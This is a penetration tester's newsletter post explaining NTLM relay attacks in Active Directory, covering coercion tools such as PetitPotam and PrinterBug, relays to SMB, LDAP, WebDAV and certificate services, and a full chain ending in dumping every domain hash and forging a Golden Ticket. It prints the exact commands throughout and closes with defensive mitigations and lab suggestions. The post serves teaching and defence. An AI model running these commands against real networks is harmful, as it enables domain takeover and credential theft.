NTLM Relay: Why Authentication in AD is Still Broken

Table of contents

Hey everyone,

It’s been a while since I’ve talked about Active Directory attacks. These days I’m mostly focused on Web3 security at work, so I don’t get to play with Windows environments as much as I used to. But NTLM Relay attacks hold a special place for me.

Back in university, I realized pretty quickly that our curriculum didn’t cover Windows security at all. Everything was Linux, networking fundamentals, maybe some basic web security. But I knew that most companies run Active Directory, and if I wanted to be useful in real environments, I needed to understand how to break into them.

So for my final thesis project, I built Igris, a tool similar to CrackMapExec for attacking AD environments. It forced me to really dig into how SMB, NTLM, Kerberos, and all these protocols actually work under the hood. That project taught me more about offensive security than any class did.

I wrote a detailed article about NTLM basics a while back that covers the foundational concepts. This newsletter builds on that and focuses on the newer coercion techniques and relay methods that have emerged over the past few years.

One thing I want to mention upfront: NTLM Relay attacks can generate a lot of noise on the network unless they’re very targeted. Authentication attempts, failed logins, unusual traffic patterns, all of it shows up in logs. So in real engagements, I usually save these for later in the assessment. They tend to work really well, but if you’re trying to stay under the radar, you don’t want to start blasting coercion attacks at every machine on the network. Use them strategically.

And honestly, I needed the refresher myself. When you spend months auditing smart contracts, you start to forget the muscle memory of AD exploitation. So let’s get back into it.

What NTLM Relay Actually Is

When you authenticate to a Windows machine using NTLM, you’re basically doing a challenge-response exchange. The server sends you a challenge, you hash it with your password, send it back, and the server verifies it.

NTLM Relay takes advantage of a fundamental flaw: if you can intercept that authentication attempt, you can forward it to a different server. You’re not cracking the password. You’re just passing the authentication along to another machine that accepts NTLM.

Here’s the flow:

1. Victim tries to authenticate to Attacker
2. Attacker receives the auth attempt
3. Attacker forwards it to Target server
4. Target accepts it (thinks it's talking to Victim)
5. Attacker now has authenticated session as Victim

The key thing to understand: you’re not stealing credentials. You’re hijacking an authentication conversation that’s already happening.

Why NTLM Still Exists

Good question. Kerberos has been the default since Windows 2000. Why is NTLM still around?

Legacy systems. Third-party applications that don’t support Kerberos. Fallback mechanisms when Kerberos fails. Workgroup environments. And the big one: organizations that never actually disabled it because “something might break.”

Microsoft has been trying to kill NTLM for years. They keep pushing it back. Last I checked, the deprecation timeline got extended again. So for the foreseeable future, NTLM is still in play, which means these attacks still work.

Forcing Authentication: Coercion Attacks

The hardest part of NTLM Relay used to be getting someone to authenticate to you. You’d set up Responder, poison some LLMNR/NBT-NS traffic, and hope someone mistyped a UNC path.

Then coercion attacks changed everything. These are techniques that abuse legitimate Windows features to force a machine to authenticate to an attacker-controlled server. No user interaction needed.

PetitPotam

This one made waves in 2021. It abuses the MS-EFSRPC protocol (Encrypting File System Remote Protocol) to trigger authentication. Any domain user can call it, and you can force a Domain Controller to authenticate to you.

python3 PetitPotam.py attacker-ip target-dc-ip

When this came out, it was being used to relay DC authentication to AD CS servers and get certificates that let you impersonate the DC. Instant domain compromise.

PrinterBug (SpoolSample)

Older but still works. Abuses the Print Spooler service. If the spooler is running (and it usually is), you can force a machine to authenticate to you.

python3 printerbug.py 'domain.local/user:password'@target-ip attacker-ip

The beauty of this one is that it works against servers, not just workstations. So you can hit file servers, SQL servers, whatever’s running the spooler.

DFSCoerce

Exploits the DFS (Distributed File System) protocol. Similar idea, different protocol.

python3 dfscoerce.py -u user -p password -d domain.local attacker-ip target-ip

ShadowCoerce

Abuses the Volume Shadow Copy service. Less commonly patched than some of the others.

python3 shadowcoerce.py -d domain.local -u user -p password attacker-ip target-ip

There are more. New ones get discovered periodically. The pattern is always the same: find a protocol that triggers authentication, call it remotely, force the target to connect back to you.

NTLM Relay to SMB

The classic target. If SMB signing is disabled or not required, you can relay NTLM authentication to SMB shares and execute commands.

First, set up your relay:

ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

The -tf flag points to a file with target IPs. -smb2support handles SMB2/3. -c specifies the command to run when you get a session.

Then trigger authentication from your victim to your attacking machine. If the victim has admin rights on the target, you get code execution.

ntlmrelayx.py -tf targets.txt -smb2support -i

When a relay succeeds, it’ll spawn a local SMB or SOCKS server that you can connect to for an interactive session.

NTLM Relay to LDAP

This is where things get interesting. Relaying to LDAP lets you modify Active Directory without needing DA privileges.

Set it up:

ntlmrelayx.py -t ldap://dc-ip --escalate-user lowpriv-user

This will try to give DCSync rights to lowpriv-user. If you relay a Domain Admin’s auth, it works. Then you just run:

secretsdump.py domain.local/lowpriv-user:password@dc-ip -just-dc

And dump all the hashes in the domain.

Another useful one is creating a computer account and abusing RBCD:

ntlmrelayx.py -t ldaps://dc-ip --delegate-access

When you relay a machine account’s authentication, this creates a new computer object and configures delegation so you can impersonate any user on the relayed machine.

NTLM Relay to LDAPS (with Signing)

LDAP signing is a common mitigation. But if the target supports LDAPS (LDAP over SSL), you can still relay to it.

ntlmrelayx.py -t ldaps://dc-ip --escalate-user lowpriv-user

The s matters. LDAPS on port 636 instead of 389.

NTLM Relay to HTTP/WebDAV

If you find an internal web app that uses NTLM authentication, you can relay to it. WebDAV endpoints are particularly interesting because they often allow file uploads.

ntlmrelayx.py -t http://webapp-ip/webdav/

If the relayed user has write access, you might be able to drop a webshell.

NTLM Relay to AD CS (ESC8)

Active Directory Certificate Services is a high-value target. If you can relay to the Web Enrollment endpoint, you can request certificates on behalf of the victim.

ntlmrelayx.py -t http://adcs-server/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

If you relay a DC’s authentication and request a DC certificate, you can use that cert to authenticate as the DC. From there, you can DCSync or do whatever you want.

This is exactly what PetitPotam was being used for when it first dropped.

Putting It All Together

Here’s a realistic attack flow:

nxc smb targets.txt --gen-relay-list relay-targets.txt

ntlmrelayx.py -tf relay-targets.txt -t ldap://dc-ip --escalate-user attacker

python3 PetitPotam.py your-ip dc-ip

secretsdump.py domain.local/attacker:password@dc-ip -just-dc

5. Extract the krbtgt hash and create a Golden Ticket. Domain owned.

Tools You Need

ntlmrelayx.py – The core relay tool. Part of Impacket. impacket

Responder – Poison LLMNR/NBT-NS, capture auth attempts. Responder

PetitPotam – Force DC authentication. PetitPotam

Coercer – All-in-one coercion tool. Supports multiple protocols. Coercer

NetExec (nxc) – Enumerate SMB signing, identify relay targets. NetExec

Defense and Detection

If you’re on the blue team side, here’s what actually stops these attacks:

Enable SMB Signing – Require it on all machines. This kills relay to SMB.

Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options
Microsoft network server: Digitally sign communications (always) - Enabled

LDAP Signing and Channel Binding – Prevents relay to LDAP/LDAPS.

Disable NTLM – The nuclear option. Test heavily first because things will break.

Patch Print Spooler, disable unnecessary services – Limits coercion vectors.

Monitor for coercion attempts – Look for unusual EFSRPC, RPC, DFS calls in logs. Tools like MDI (Microsoft Defender for Identity) can detect some of these.

Where to Practice

You need a lab for this. These attacks don’t translate well to static challenges.

Your own AD lab – Spin up a Domain Controller, a few Windows clients, disable SMB signing, and practice relaying. I’ve written about setting up offensive labs here.

HTB Machines:

• Forest – Good intro to AD attacks, includes NTLM relay to LDAP and DCSync
• Escape – NTLM relay in Active Directory environments
• Mist – Advanced NTLM relay techniques
• Reaper – NTLM relay attack detection and exploitation
• Reel2 – Phishing to steal Net-NTLMv2 hashes via Outlook Web App

Wrapping Up

NTLM Relay attacks are old, well-documented, and still work all the time. The core vulnerability hasn’t changed. What has changed is the number of ways you can force authentication without user interaction.

Coercion attacks like PetitPotam turned NTLM Relay from an opportunistic attack into a reliable exploitation technique. Combined with relay to LDAP or AD CS, you can go from any domain user to Domain Admin in minutes.

If you’re pentesting AD environments and you’re not checking for relay opportunities, you’re missing easy wins. And if you’re defending AD, make sure SMB signing is enforced and LDAP signing is enabled. These mitigations actually work.

For me, revisiting these techniques after months of smart contract auditing is like coming back home. The mindset is different, the tools are different, but the satisfaction of chaining together a clean attack path? That never changes.

Thanks for reading. Hope this gives you another tool in your AD toolkit.

Website Updates

Quick heads up: I’ve completely rebuilt the Kayssel website. Migrated from Ghost CMS to a full Astro static site. The backend is now much faster and cleaner.

What’s new:

• Light theme - Finally added a light theme option
• Improved search - Much more responsive and easier to use
• Better reading experience - Enhanced post layout and typography
• Keybindings on desktop - Navigate faster with keyboard shortcuts

If you spot anything weird or broken, please let me know. I’ve tested everything, but there’s always something that slips through. Drop me a message on Twitter or Mastodon if you run into issues.

Stay sharp, Ruben

Chapters

CSP for Pentesters: Understanding the Fundamentals

Previous Issue

XXE Injection: When XML Parsers Become Your Worst Enemy

Next Issue